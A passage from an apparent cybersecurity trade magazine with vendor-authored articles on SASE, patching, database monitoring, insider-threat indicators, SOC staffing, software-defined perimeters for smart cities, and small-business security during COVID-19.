issues such as how they’re configured. A business’s resources may be secure but the wrong box ticked 

in the admin panel of a cloud-based service is enough to open cracks that need just a bit of pressure to 

widen into a breach. 

Sensitive data is also exchanging more hands faster than ever, during a time when hackers are ramping 

up their activities to take advantage of the pandemic panic. Under these conditions, orchestrating a stack 

of traditional security products isn’t enough, even if they can be deployed in a way that secures the 

network on paper. We don’t live on paper. In reality, the tool sprawl approach creates maintenance issues 

that the security industry must address alongside classic ideas like threat detection and visibility. 

For IT, planning security for in-office infrastructure is simpler, because all employees are always 

connecting from the same devices, locations, and IP addresses. Very few security “profiles” need to be 

built, so even with an unwieldy and piecemeal stack of different security tools, smart network access 

doesn’t need to be scalable. Once network traffic moves from inside the office to outside, however, each 

remote worker represents a unique threat. 

Remote Work Accelerates the Materialization of SASE 

Which providers will be the ones to respond best to the future of remote work - the one where the idea of 

remote network access is fast, secure, and scalable? Surely not those who still offer singular firewall 

services, or those with a basic VPN solution. None of these solutions alone is enough to defend the 

network. Funnily enough, the blueprint for a single security product that might do so was created only 

months before the conditions that would necessitate it. 

This security ‘blueprint’ is at the heart of a new industry space race. In fact, the idea is so young that it is 

prevalent largely among providers rather than the consumers of security, such as in-house IT 

professionals. Called SASE, or Secure Access Service Edge, Gartner coined this term to describe a 

unified network security product deployed over the cloud (SaaS), which would change how organizations 

consume security and refocus it around users. 



Imagined as able to integrate directly with all the resources used by any organization, sans hardware, a 

SASE product will make it stunningly simple for the average IT employee to segment the network and 

create custom access profiles based on user roles, devices, or locations. At the same time he or she can 

enforce the use of advanced security features still sold separately, like IPSec tunneling, 2FA, DNS 

filtering, FWaaS, and CASB, and route employee traffic through secured gateways closest to wherever 

they choose to work. 

The Beacon is Lit 

It wasn’t the idea of SASE that signaled the starting gun for the security sector’s space race, it was the 

rush to support remote workers and the off-hand realization that SASE was a prebuilt solution. The rising 

trend of remote work has then also paralleled the prevalence of SASE in the market, and significant 

progress has occurred in the space to bring the horizon closer. In the near future, any enterprise-level 

company will only need to deploy a single product to secure its local and cloud networks, and the 

employees connecting to them from couches and cafes around the world. 

Mergers and acquisitions are happening at breakneck speed in the security industry right now, and the 

landscape a year from now will be nearly unrecognizable. Reminiscent of how other industries have seen 

their products and services consolidated (the evolution of Microsoft’s product suite into Office 365 is a 

clear example), security is soon to become a matter of simply point, and click. 


Amit Bareket is the Co-Founder and CEO of Perimeter 81. Amit is 

a cybersecurity expert with extensive experience in system 

architecture and software development. He is the author of 8 

patents issued by the USPTO for storage, mobile applications and 

user interface. Prior to Perimeter 81, Amit worked as a Software 

Engineer for major enterprises including IBM XIV Storage and 

BigBand Networks. He served in the Israel Defense Force’s elite 

cyber intelligence unit and graduated Cum Laude with a B.Sc. in 

Computer Science and Economics from Tel Aviv University. 



Organizations: It’s Time to Rethink How You Protect 

Environments from Within 

By Richard Melick, senior technical product manager, Automox 

Many of us have made the shift to virtual with our work, school and social lives, as we all aim to protect 

ourselves and the community during this uncertain time. As such, it’s important to understand that with 

new virtual workflows comes an expanded attack surface for hackers to potentially exploit. 

In particular, many organizations are struggling with securing and hardening new and existing endpoints 

against critical vulnerabilities, an issue that has been exacerbated as remote work policies are enacted. 

Automox’s recent Cyber Hygiene Index surveyed 560 IT and security professionals and uncovered that 

less than 50 percent of organizations can patch vulnerable systems swiftly enough to protect against 

critical threats and zero-day attacks. 

Endpoint hardening is a critical component of any security strategy, and if not properly managed, can 

pose a major threat to an organization's infrastructure. Attackers only need to find one way in to victimize 

a system or device – and an endpoint that isn't equipped with the latest patches and security 

configurations is likely to be ripe with exploitable vulnerabilities. It is essentially leaving a door unlocked 

with a welcome sign out front for attackers. 

Is it possible to lessen devastating data breaches within enterprises? Yes, but effective cyber hygiene 

measures must be put into place, especially during transitional and uncertain times like today. 



The Ongoing Patching and Configuration Crisis 

When you couple new potential entry points for hackers to exploit along with the fact that organizations 

report taking up to 102 days for patches to be applied and tested, it is apparent that the enterprise attack 

surface is growing at an unprecedented rate. 

To fully understand the scope of the issue, look no further than three years ago with the WannaCry 

ransomware attack. The ransomware was able to spread rapidly by exploiting a known vulnerability that 

was left unpatched in a large majority of organizations for months – leading to one of the most notorious 

hacking events of our lifetime. 

Research for the Automox Cyber Hygiene Index also confirmed that four out of five organizations have 

suffered at least one data breach in the last two years. When asked about the root causes, respondents 

placed phishing attacks (36%) at the top of the list, which is to be expected. Social engineering attacks 

continue to be a favorite initial vector that attackers use. 

The surprising part of the results is that the majority of breaches could have been prevented with basic 

cyber hygiene practices in place. The other top causes were missing operating systems patches (30%), 

missing application patches (28%), and operating system misconfigurations (27%) – all of which are 

fundamentals of proper endpoint hardening. 

The Industry is Failing to Keep Up 

Adversaries are weaponizing new critical vulnerabilities within 7 days on average. And zero-day 

vulnerabilities are already weaponized at the moment of disclosure, yet companies are known to take 

weeks and in some cases months to deploy patches. 

For this reason, a 24 / 72 threshold for endpoint hardening is imperative. If organizations can commit to 

eliminating zero-day exploits within 24 hours and other critical vulnerabilities within 72 hours, they’ll 

prevent weaponization and ultimately better protect their critical assets. 

According to the recent survey, the industry is still catching up to meet this ambitious patching standard. 

Only 42 percent of companies can patch remote endpoints within three days and 15 percent within one, 

highlighting the struggles companies face with patching and hardening endpoints in remote 

environments. 

Embracing Newer Technologies to Help 

One of the more positive outcomes from the research is that companies are increasingly embracing 

automation as a potential antidote for the security challenges that they are currently facing. 

The findings showed that 96 percent of organizations have deployed some automation for endpoint 

patching and hardening, yet only 23 percent are fully automated. 



While newer technologies, such as automation, are not a silver bullet, they sure can help ease the efforts 

in protecting infrastructure – and executing complex tasks in a timely manner. This effectively eases the 

burden on IT and SecOps teams, all while maintaining better security for the organization as a whole, a 

true win-win scenario. 

The Answer to Better Cyber Hygiene? 

Good cyber hygiene doesn't have to be complicated. A great place to start to make the transition to a 

more modern approach is to audit your organization and take a look at how it leverages its people, 

processes and technologies to better secure its endpoints and other assets. 

Are our people being put in a position to succeed? What processes could be eliminated or improved? 

Are we getting enough out of our technologies to make our security team’s workflow easier? 

By answering these important questions and acting on that information, organizations will have a better 

understanding of how they can adapt their strategies to address today’s and tomorrow’s challenges. 

In times of uncertainty, it’s important that businesses look for long-term fixes, as opposed to putting a 

band-aid on issues that are likely to pop up again. The future of work is remote, and it’s critically important 

that decision-makers across every industry set their IT and security teams up for future success while 

meeting the standards they need to meet today. 


Richard Melick, senior technical product 

manager, Automox. Richard has spent over a 

decade advancing through the security industry 

with his considerable experience and 

considerable focus on the stories surrounding 

ransomware, hacking, and cyber attacks. He has 

been a security speaker on five continents and 

has even advised royalty on how to make and 

distribute ransomware. 

Richard can be reached online at 

(Automox@famapr.com, @AutomoxApp, etc..) 

and at our company website 

https://www.automox.com/ 



Don’t Be Breached When Using Commercial Software 

Products 

By Randy Reiter CEO of Don’t Be Breached 

In May, 2020 the software giant SAP made available eighteen security fixes for its Adaptive Server 

Enterprise (ASE) database system (formerly Sybase ASE). ASE is used by SAP products and 30,000 

organizations worldwide. 90% of the top 50 banks and security firms use ASE. 

Four of the eighteen security fixes had a CVSS score of 8 or higher. Common Vulnerability Scoring 

System (CVSS ) is a free and open industry standard for assessing the severity of computer system 

security vulnerabilities. Vulnerabilities are scored from 0 to 10 with 10 being the most severe. 

One of the security fixes was for SQL Injection Attacks. This vulnerability allowed any user of a database 

regardless of their permission level to gain Administrator access to the entire database. Wow. 

SAP software products are comprehensive and complex. SAP customers have added on average up to 

2 million lines of custom code to their deployment. This makes applying security patches a lengthy 

process due to comprehensive application testing requirements prior to deployment of the security fixes. 

Other 2020 Database Security Vulnerabilities: 

• June, 2020. KingMiner botnet operation targets SQL Server databases with brute force attacks. 

The KingMiner botnet has been active since 2018. Once KingMiner gains access to SQL Server 

it is capable of gaining root access to the Windows server. 

• May, 2020. Hacker leaked online the database for 7,600 websites serviced by Daniel’s Hosting. 

Daniel’s Hosting is the largest free web hosting provider for Dark Web services. The leaked 



database included 3,000+ email addresses, 7,000+ account passwords and 8,000+ private keys 

for .onion (dark web) domains. 

How to Protect Confidential Database Data from Insider Threats and Hackers? 

Confidential database data includes: credit card, tax ID, medical, social media, corporate, manufacturing, 

law enforcement, defense, homeland security and public utility data. This data is almost always stored in 

Cassandra, DB2, Informix, MongoDB, MariaDB, MySQL, Oracle, PostgreSQL, SAP Hana, SQL Server 

and Sybase databases. Once inside the security perimeter a Hacker or Rogue Insider can use commonly 

installed database utilities to steal confidential database data. 

Non-intrusive network sniffing can capture and analyze the normal database query and SQL activity from 

a network tap or proxy server with no impact on the database server. This SQL activity is very predictable. 

Database servers servicing 10,000 end-users typically process daily 2,000 to 10,000 unique query or 

SQL commands that run millions of times a day. 

Advanced SQL Behavorial Analysis of Database Query and SQL Activity 

Advanced SQL Behavioral Analysis of the database SQL activity can learn what the normal database 

activity is. Then from a network tap or proxy server the database query and SQL activity can be nonintrusively 

monitored in real-time and non-normal SQL activity immediately identified. Non-normal SQL 

activity from Hackers or Rogue Insiders can be detected in a few milli seconds. The Hacker or Rogue 

Insider database session can be immediately terminated and the Security Team notified so that 

confidential database data is not stolen. 

Advanced SQL Behavioral Analysis of the query activity can go even further and learn the maximum 

amount of data queried plus the IP addresses all queries were submitted from for each of the 2,000 to 

10,000 unique SQL queries sent to a database. This type of data protection can detect never before 

observed query activity, queries sent from a never observed IP address and queries sending more data 

to an IP address than the query has ever sent before. This allows real-time detection of Hackers and 

Rogue Insiders attempting to steal confidential web site database data. Once detected the security team 

can be notified within a few milli-seconds so that a data breach is prevented. 


Randy Reiter is the CEO of Don’t Be Breached a Sql Power Tools company. He 

is the architect of the Database Cyber Security Guard product, a database data 

breach prevention product for Informix, MariaDB, Microsoft SQL Server, MySQL, 

Oracle and Sybase databases. He has a Master’s Degree in Computer Science 

and has worked extensively over the past 25 years with real-time network sniffing 

and database security. Randy can be reached online at 

rreiter@DontBeBreached.com, www.DontBeBreached.com and 

www.SqlPower.com/Cyber-Attacks. 



Is Proactive Insider Risk Mitigation Possible? 

Why Companies Need More Than Technical Indicators to Identify Their Biggest Threats Before They 

Do Harm 

By David A. Sanders, Director of Insider Threat Operations, Haystax 

Most corporate insider threat programs are structured and equipped to mitigate adverse events 

perpetrated by trusted insiders only after they have occurred. But proactive insider risk management is 

possible – and it starts with a robust approach to detection. 

Consider this scenario, based on a real-life case, in which a concerning insider threat event turns out to 

be more complicated than expected: 

John commented to other employees that it would be easy to take down the new cloud services 

his company recently migrated to from their on-premises systems. The employees reported the 

comment to their manager, who reported it to human resources and ultimately the company’s 

insider threat program. An investigation revealed that John was angry because his role had 

changed with the new architecture. In addition, he was clinically depressed, off medication and 

had suicidal thoughts. The investigative results prompted a coordinated response among the 

insider threat program, security, legal and human resources. The threat was mitigated, with the 

final step of referring John to the employee assistance program. 

Because the insider threat team was notified about one behavioral indicator of a high-impact event, 

additional indicators were gathered and assessed to determine that John was a potential threat to the 

company and to himself. In doing so, the company was able to intervene and proactively mitigate an 

insider threat event before it occurred. The resulting cost and impact were minimal. By contrast, the 

projected cost and impact of the cloud services being taken off-line for one day were very high. 



It is impossible to know whether John would have committed an act of sabotage or self-harm, but the 

mitigation efforts nevertheless reduced the chances and allowed John to remain employed and 

productive. 

Without a proactive response, the alternative is to detect and respond to an event after it occurs, incurring 

the cost of the impact then attempting to minimize the effect. 

The Path to Proactive Risk Mitigation 

Eric Shaw and Laura Sellers created the ‘Critical Path to Insider Risk’ in 2015, after studying insider threat 

cases in the U.S. intelligence community and at the Department of Defense. They concluded that 

perpetrators exhibit observable indicators prior their acts. This concept is represented in the graphic 

below. 

Source: Eric Shaw and Laura Sellers (2015) "Application of the Critical-Path Method to Evaluate Insider 

Risks," Studies in Intelligence, Volume 59, Number 2, June, pages 41-48. The Central Intelligence 

Agency, Washington, DC. 

The practical application of these findings is that knowledge of ‘personal predispositions’ and behavioral 

indicators can inform the judgment of experts to determine whether an insider is on the path to becoming 

a risk. 

Based on that judgment, a measured and effective response can be planned to assess the risk through 

preliminary assessments – and perhaps a complete investigation, if warranted. The goal is to mitigate or 



prevent the insider risk event by engaging with the potential threat early. This is precisely what occurred 

in John’s case. The company responded effectively to ‘turn John around’ and prevent potentially hostile 

and harmful acts from occurring. 

Technical and Non-Technical Risk Indicators 

The Defense Counterintelligence and Security Agency (DCSA) Center for Development of Security 

Excellence published a list of potential risk indicators, which are categorized below into ‘Technical 

Indicators’ and ‘Non-Technical Indicators.’ Technical indicators can be detected by monitoring and 

analyzing computer and network activities. Non-technical indicators typically occur off the computer and 

network and therefore cannot be detected on those systems. 

Insider threat potential risk indicators categorized by whether or not they can be commonly detected by 

monitoring computer and network activity. 

While the average enterprise insider threat program might not share the same objectives as DCSA, the 

agency’s human-centric view of the challenge is instructive to companies because the cause of insider 

threat problems is, by definition, known individuals associated with and managed by the organization. 

Effort and resources allocated to gathering, integrating and analyzing non-technical indicators to better 

know those individuals can improve the effectiveness of programs that mostly rely on technical indicators 



to prioritize higher-risk employees. In this regard, non-technical indicators help programs to get ahead of 

insider threat problems, rather than simply react to them. 

Using Non-Technical Risk Indicators 

Non-technical indicators are available within most company systems. For example, human resource 

information systems will contain data about promotions, demotions, suspensions, performance ratings, 

training records and previous employers. Security information systems may have records of violations, 

anomalous attempts to gain access to unauthorized areas and, in the case of the defense and aerospace 

industry, security-clearance denials. 

Facilitating the identification and reporting of additional kinds of non-technical behaviors can be more 

challenging. For example, ‘See Something, Say Something” programs have limited utility for multiple 

reasons. First, co-workers often do not consciously recognize the indicators until they are significant or 

until something bad happens. Second, if they do recognize a concern, they rarely report it because they 

do not see it as significant, or they do not want to get someone they like in trouble. 

To overcome these challenges, insider threat programs need to repeatedly communicate that the goal of 

the program is to mitigate risks in a proactive and positive manner, helping employees while protecting 

company assets. As this goal is accomplished, stakeholders, supervisors and employees will take notice, 

which will increase compliance and participation in the reporting program. 

Next, insider threat programs need to facilitate the reporting of anomalous activity by supervisors. This 

can be accomplished via direct conversations, indirectly through human resources or by using surveys. 

The results of this reporting should then inform the insider threat program threat detection capability. 

Temporal Analysis 

The importance of integrating and analyzing indicators over time cannot be overstated. Let’s consider a 

fictitious scenario where there are non-technical behavioral indicators that increase the threat level of an 

employee: 

Jolene has been with her company for three years. Initially she was a good performer but that has 

changed over the past two years. She has grown increasingly unhappy with her job as a database 

administrator and her personal life is in shambles. She finds her role trivial and she feels the 

company is not treating her fairly compared to others, which she has expressed to human 

resources. She applied for a position in another department but was not selected, which made 

her even more angry and frustrated. She has access to mission-critical systems with authorization 

to create and destroy databases, tables and records. Her supervisor works from another office 

location, and does not meet with her more than once every two weeks. Outside of work, Jolene 

barely has enough money to pay rent for a two-bedroom apartment since her boyfriend left town. 



Moreover, she recently wrecked her truck and her cat is sick again. She is not sleeping well and 

has turned to drugs and alcohol. 

Jolene has moved far along the critical path to insider risk. She has multiple stressors, exhibits concerning 

behaviors and has experienced problematic organizational responses. And she has access to critical 

company systems. 

It would be wise to fully evaluate then mitigate any risk that Jolene presents, with the goal of protecting 

company assets and assisting a struggling employee. Yet very few companies have the capability to 

assemble and analyze this non-technical information to effectively identify when an insider like Jolene is 

on the path to insider risk. Assessing employees’ private lives through background or credit checks or 

other measures is not even necessary in most cases; many other indicators are already collected by the 

organization and readily available. 

The inadequate use of non-technical indicators might be due to the fact that many insider threat programs 

grow out of existing cyber security programs using management tools such as UEBA and SIEM, which 

were developed to evaluate large volumes of technical data using rules and machine learning to identify 

technical behavioral anomalies. 

As discussed above, when looking at insider threats as caused by known humans, these technical 

indicators are perhaps one-third of the picture. Risk-scoring models built solely around technical 

indicators are not designed to put the anomalies that they detect into the broader context of the critical 

path to insider risk. These models can only be effective if they add non-technical behavioral indicators to 

the analytical mix. 

Multi-Disciplinary Technology Platforms for Evaluating Insider Threats 

Insider threat programs should consist of diverse experts representing human resources, legal, 

information security, cybersecurity, information technology, physical security, behavioral science and 

counterintelligence. These disciplines bring data and perspective when evaluating insider threats. They 

weigh evidence and give opinions on whether the behavior is indicative of a threat. 

The problem is that this approach does not scale well in organizations with large numbers of employees, 

since no team of experts could keep up. 

But the experts can share their judgments and wisdom in analytic tools that apply complex reasoning that 

goes into contextualized analysis of insider threats. For this approach, Bayesian inference networks are 

an ideal solution. 

Bayesian networks can be built to probabilistically model expert reasoning across multiple domains using 

the full range of technical and non-technical behavioral indicators of insider risk. The result is a vastly 

improved capability to identify high-risk insiders that have committed threat activities, as well as those 

who are on the Critical Path to potentially commit them in the future. The probabilistic model enables the 

desired proactive response necessary to protect company assets, including the insiders themselves. 




David Sanders is Director of Insider Threat Operations at Haystax, a 

business unit of Fishtech Group. Previously, he designed and managed 

the insider threat program at Harris Corporation, now L3Harris 

Technologies. David also served on the U.S. government’s National 

Insider Threat Task Force (NITTF). David can be reached online at 

(dsanders@haystax.com or https://www.linkedin.com/in/david-sandershaystax/) 

and at our company website http://www.haystax.com/ 



Benefits of A Security Operation Center (SOC) 

By Pedro Tavares, Editor-in-Chief seguranca-informatica.pt 

The creation of a Security Operations Ce nter (SOC) has increasingly stood out as something necessary 

to help companies defend themselves against damage caused by cyber-attacks. SOC is considered the 

kernel of an organization's security operations, the purpose of which is to provide detection and response 

services to security incidents. 

The creation of a SOC from-scratch involves a large investment in human and technological resources, 

especially when it is intended to maintain operations on a full-scale 24×7. Implementing a SOC solution 

goes far beyond buying technologies and putting it into operation. First, there is a great shortage of 

qualified professionals which makes it a real challenge to bring them into your organization. From a 

technological perspective, the right equipment and the right platforms can help you automate or at least 

optimize your incident detection and response capabilities. How to decide the best option: Implement or 

Hire a SOC? The answer is not simple. 

Create your own SOC or Hire a third-party SOC 

One of the advantages of creating your own SOC is having a team exclusively dedicated to achieving 

your goals. This team will have a deep understanding of the business. They will better understand the 

general context around events and have more knowledge about how you operate in contrast to a third 

party SOC. 



On the other hand, buying a SOC solution can be cost-effective. You may not need to buy software or 

equipment directly, and you won't have to hire or manage the team full time. Managed Security Service 

Provider (MSSP) will take care of everything for you - from the integrity of the infrastructure to triage and 

incident response. Since obtaining technology and personnel costs will not a preoccupation for you, the 

total investment value may end up being much lower. 

How to choose the best option 

The responses are not linear, but some questions can help you to make the final judgment. 

● 

● 

● 

● 

● 

How do security and SOC align with the business strategy and mission? 

Do you intend to operate on a 24 × 7 scale? 

Are the investments involved justified? 

Does your business need greater control by demanding its own SOC? 

What would happen to your business if it suffered a security breach? 

When considering the last question, if the impact is minimal, it is suggested to hire a SOC solution. If the 

impact is quite significant, then I advise you to develop your own SOC solution. 

Developing a SOC can be very costly if not done in the right way. Some mistakes can even compromise 

your business goals and objectives. The lack of experienced professionals in the market definitely makes 

managing your own SOC a little more challenging - the demand is huge and your partners and 

competitors looking for the same resources as you. 

In sum, the challenge of implementing a SOC in your organization is enormous, but the benefits are 

notorious. 

Continuous Protection: Having a command center that monitors your network and/or facility 24/7. 

Timely Response: The gap between critical event and response time narrows. 

Help Customers/Stakeholders Feel Secure: A security command center can serve external and 

internal marketing purposes as well. 

Simplify Investigations: Capabilities of a security operations center on hand can expedite the process 

of analysis. 

And last but not least, a SOC solution can provide insight on identifying threats before they become 

critical events. 




Pedro Tavares is a cybersecurity professional and a 

founding member of CSIRT.UBI and Editor-in-Chief of 

seguranca-informatica.pt. 

In recent years he has invested in the field of information 

security, exploring and analyzing a wide range of topics, 

malware, ethical hacking (OSCP-certified), cybersecurity, 

IoT and security in computer networks. He is also a Freelance Writer. 

Segurança Informática blog: www.seguranca-informatica.pt 

LinkedIn: https://www.linkedin.com/in/sirpedrotavares 

Twitter: https://twitter.com/sirpedrotavares 

Contact me: ptavares@seguranca-informatica.pt 



In 2020, SOCs Are Understaffed Yet Overconfident in 

Ability to Detect Cyberthreats 

Exabeam’s ‘2020 State of the SOC Report’ offers peer-to-peer SOC comparisons 

By Steve Moore, chief security strategist, and Samantha Humphries, senior product marketing 

manager, Exabeam 

Security operations centers (SOCs) are on the frontlines in protecting businesses and government 

agencies against cyberthreats and attacks. Therefore, whether the organization has an in-house or 

outsourced SOC, it’s critical to gauge the effectiveness, given the importance it plays in the overall 

cybersecurity posture. 

Exabeam’s 2020 State of the SOC Report allows organizations to compare their SOCs to those of their 

peers around the globe and determine common pitfalls, priorities and ways to improve technology, 

staffing, employee happiness and more. Highlights include: 

This report is the Exabeam’s third annual comprehensive survey of cybersecurity professionals who 

manage and operate SOCs. Respondents include CISOs, CIOs, frontline security analysts, and security 

managers from the U.S., U.K., Canada, Germany, and Australia. The report covers a wide range of 

topics including basic SOC operations, hiring and staffing, operational processes, technology and finance 

and budget. 

Key findings include that SOC leaders and analysts are confident in their ability to detect common security 

threats but do not agree on the threats. In addition, SOC leaders and frontline analysts do not agree on 

the most common threats facing the organization. SOC leaders believe that phishing and supply chain 

vulnerabilities are more important issues, while analysts see DDoS attacks and ransomware as greater 

threats. 



However, threat hunting and the ability to remediate threats effectively stand out as critical skills that SOC 

personnel feel they lack. This gap may indicate that SOCs are overconfident in their ability to detect a full 

range of security threats. 

Figure 1: Eighty-two percent of SOC professionals are confident in their ability to detect threats. 



Figure 2: SOC leaders believe that phishing and supply chain vulnerabilities are more important issues, 

while analysts see DDoS attacks and ransomware as greater threats. 

In last year’s report, respondents cited personal and social skills as the most critical soft skill for SOC 

employees. This year, however, 62% of respondents noted the ability to work in teams as the most 

important soft skill. 



Figure 3: While hard skills remain critical, SOCs place emphasis on soft skills with the ability to work in 

teams taking precedence over formerly reported social ability. 

The importance placed on teaming is an indication that SOC staff need to work in cohesive teams and 

often with staff from other teams. SOC members that work as a team are more apt to document processes 

to standardize tasks and train new employees, which is helpful both as teams grow or are reassigned. 

Members of a SOC should not only improve teaming among their group, but also proactively strengthen 

their working relationship with other functional groups, including IT operations, NOC staff, and 

increasingly, DevOps. Working with these other groups helps to improve response time. More important, 



it will create a team that is responsive and able to adapt as the work environment shifts due to challenges 

like working with a distributed workforce and ensuring the right collaboration and communications tools 

and culture are in place. 

The report also reveals a significant decline in the ability to do threat modeling in both the U.S. and U.K. 

SOCs. Threat modeling is the systematic approach to identifying and prioritizing potential security threats 

and designing countermeasures to prevent them. The data suggests threat modeling doesn’t have an 

agreed upon standard, and most analysts perform it infrequently or not at all. 

Additionally, the ability to conduct incident analysis and budget and resource allocation for both countries 

have declined from the previous year. 

Figure 4: U.S. and U.K. SOCs reported significant declines in their ability to do threat modeling, incident 

analysis and budget/resource allocation in YoY change. 

The findings also show that when asked to rate pain points, inexperienced staff and time spent on 

reporting/documentation were common issues for managers and frontline employees but not for 

executives. 

Lending credence again to the statement, “you can’t protect what you can’t see,” senior leaders noted 

that the lack of visibility and not having a good list of assets were their most significant pain points. 



Figure 5: Inexperienced staff and too much time spent on reporting and documentation continue to be 

pain points for SOCs in 2020. 

Traditionally, SOC teams have generally been responsible for two primary responsibilities — investigating 

suspicious activities and maintaining security tools. But over the years, the responsibilities of the SOC 

has increased to include other duties such as defining security metrics and incident response. Our report 

finds that staff at all levels share these responsibilities. However, there are a couple of differences. 

CIOs and CISOs rank their responsibility for operations management as well as policy and procedure 

development highest. They also share other responsibilities with managers and frontline employees, 

including defining security objectives and metrics and incident response. Not surprisingly, maintaining 

security monitoring tools was noted as a critical responsibility for frontline employees. 



Figure 6: SOC managers drive metrics specifically in operations and management and procedure and 

policy development. 

Download the complete report to learn other points of interest that can help measure the effectiveness 

of your SOC and support you in your ongoing efforts to protect your organization. 


Samantha Humphries 

Senior Product Marketing Manager 

Samantha has 20 years of experience in cyber security. She has 

defined strategy for multiple security products and technologies, 

helped hundreds of organisations of all shapes, sizes, and 

geographies recover and learn from cyberattacks, and trained 

anyone who’ll listen on security concepts and solutions. She 

authors articles for various security publications, and is a regular 

speaker and volunteer at industry events, including BSides, 

IPExpo, CyberSecurityX, The Diana Initiative, and Blue Team 

Village (DEFCON)." 

Stephen Moore 

Chief Security Strategist 

Steve Moore is Vice President and Chief Security Strategist at 

Exabeam, helping drive solutions for threat detection and 

advising customers on security programs and breach response. 

He is the host of the “The New CISO Podcast” and a Forbes 

Tech Council member. Prior to Exabeam, Moore served as Staff 

VP of Cybersecurity Analytics at Anthem, a Fortune 30 

healthcare company. Moore’s experience includes leading the 

investigation of state sponsored cyberespionage campaigns, 

breach response, associated legal depositions, and client 

management. He’s passionate about cybersecurity, teamwork and leadership excellence. 



Software-Defined Perimeters Offer Secure Connectivity 

to Smart Cities 

By Don Boxley, CEO and Co-Founder, DH2i (www.dh2i.com) 

Smart cities are on the rise—in a really big way. According to Microsoft, smart-city initiatives—which can 

be defined as cities that rely on Internet of Things (IoT) sensors to obtain data that’s then mined to guide 

management of city services and resources—account for nearly a quarter (23 percent) of the world’s IoT 

projects. 

As the number of smart cities mushrooms, these hyperconnected urban areas are becoming increasingly 

critical to how seamlessly cities are able to operate. This is an important point to grasp, since cities serve 

as the linchpin for most of the world’s data generation, as well as the majority of all energy consumption. 

What’s more, most of us live in cities. The UN reports that just over half (55 percent) of the world’s 

population makes a city their home—a figure that the UN predicts will rise significantly (close to 70 

percent) in the next 30 years. 

Here are some additional stats to impress upon you the importance of our urban areas in general, and 

smart city growth in particular: 

• Forbes reports that by 2025, we’ll be looking at approximately 80 billion devices that are smart 

devices. 



• By then, our global cities may be cranking out up to 180 zettabytes of data. 

• In terms of energy production, The World Bank reports that our urban meccas already gobble up 

to 80 percent of its worldwide. 

• Over the next decade, cities will likely be responsible for close to three-quarters (74 percent) of 

global greenhouse gases, up from around two-thirds, or 67 percent, currently. 

Adding Predictability with Smart Edge Devices 

It can feel overwhelming to consider the vast scope of the challenges that face today’s cities. Cities are 

charged with managing an ever-expanding laundry list of problems, including transportation, water and 

energy, public health, infrastructure, public safety, waste reduction, and more. As the current global 

pandemic and COVID-19 are showing, the high population and density of cities can quickly turn them 

into a hotbed of issues that require the best that technology can offer to aid communication and mitigate 

complexities. 

To that end, studies have proven the value of edge computing and smart IoT edge devices, particularly 

when it comes to smart cities. A comprehensive survey on “Edge Computing Enabled Smart Cities” by 

Khan et al for the Institute of Electrical and Electronics Engineers (IEEE) stated that “it is evident from 

literature that IoT is an integral part of smart cities. The next step is enabling the resource intensive and 

strict latency IoT based smart city applications. Edge computing provides a promising way of enabling 

these applications by offering computation and storage resources with low latency.” 

However, metropolises still have a significant issue to figure out—security—when leveraging the power 

of edge computing in smart cities. How can our global municipalities offer secure connectivity from their 

datacenters (as well as from the cloud) to the edge? The answer lies in the secure environment provided 

by software-defined perimeter (SDP) technology. 

Safeguarding the Edge 

SDP software provides the needed security for smart IoT edge devices by creating a “zero trust” 

environment. This means edge devices don’t have full network access, but instead can only access the 

exact applications that the city’s IT department has authorized them to see, whether in the cloud or 

datacenter. 

In other words, SDP allows for access at the application level only, not at the network level. As a result, 

lateral attacks are no longer a thing, and smart cities can enjoy the “secure by default” architecture that 

they require. 

Here’s how SDP solutions work to help create secure, hyperconnected smart cities: 



• SDP software allows for data transfer, by way of encrypted micro-tunnels, right from smart IoT 

edge devices to various destinations—whether an on-premises site, multi-cloud, or hybrid-cloud 

setting. 

• To ensure secure connectivity and transmission, SDP also uses public key authentication. 

• Specific types of SDP software make this happen through an enhanced user datagram protocol 

(UDP), which has randomly generated ports that render the tunnels basically invisible to 

cybercrooks. 

Other benefits for city IT staff include that SDP offers easy configuration and management, which aids 

scalability. The software requires no appliances, and also avoids the various maintenance and security 

challenges of VPNs, which were designed for a physical-server environment. SDP has performance 

advantages as well, with the encrypted micro-tunnels offering the ability to be made highly available. 

Smart devices and edge computing has proven ability to help smart cities advance and problem-solve— 

but without secure connectivity, these measures fall short. By pairing an SDP client with smart devices, 

those who are working on creating the hyperconnected smart cities that will take us into the future can 

safeguard their investment of time, resources, and data as well. 

About the author 

Don Boxley Jr is a DH2i co-founder and CEO. Prior to DH2i, Don spent 

more than 20 years in management positions for leading technology 

companies, including Hewlett-Packard, CoCreate Software, Iomega, 

TapeWorks Data Storage Systems and Colorado Memory Systems. Don 

earned his MBA from the Johnson School of Management, Cornell 

University. 



Managing Small Business Cybersecurity During Covid-19 

By Bill DeLisi, CEO of GOFBA 

Small businesses are undertaking extraordinary changes during the coronavirus epidemic. They’re 

laying off staff, shifting their business models, and managing the challenges of remote work. The pace 

of the stay-at-home orders and the abrupt halt of the economy required small businesses to move 

quickly. States are in the midst of gradually reopening, but many smaller firms will continue to face 

impactful challenges for the rest of the year and beyond. In addition to the safety and health issue 

concerns, small firms are also facing cybersecurity risks. 

Compared to enterprise-level firms, small businesses do not possess massive IT budgets to confront 

threats. Large firms have capital to weather business interruptions that might come from data breaches. 

Small businesses are already devastated during COVID-19, they can’t risk losing data and being offline 

for even a day. And there’s the PR hit that comes with a data breach event. A small firm cannot likely 

survive a breach, especially in the current economy where competition for dollars is at a premium. 

Unfortunately, there’s many bad actors out there. Cybersecurity hacking attempts are rising during the 

COVID-19 pandemic, as hackers prey on fear and uncertainty. To that end, here are three of the most 

persistent and damaging COVID-19 driven security threats for small business, along with some tips for 

mitigating the risks. 

1. Stop Malware in its Tracks 

Malware encompasses spyware, viruses, trojans, and other tools hackers use to infect computers. The 

actual programs live on attachments and within software such as PDF viewers. Staff members must avoid 

downloading unapproved programs and understand the types of actions that can lead to malware. 



The COVID-19 outbreak offers opportunity for hackers. For example, there’s malware embedded in some 

live maps of the virus’ spread. COVID-19 themed malware that wipes a computer clean is also circulating. 

Firewalls and anti-malware programs are a first line of defense for small businesses. These programs 

must use automatic updating for maximum protection so they can detect the latest threats. 

Workers now operating from home are exposing their company’s data and networks. They’re using home 

Wi-Fi, and many are searching on non-approved or dangerous websites. Restricting search for remote 

workers is tricky but is possible through a secure search engine such as GOFBA. This platform limits 

malware by stopping users from reaching suspicious sites, while still allowing them to access information 

that pertains to their jobs. Small business staff should also limit their information gathering about the 

COVID-19 epidemic to established news and health organization sites. Unknown sites filled with 

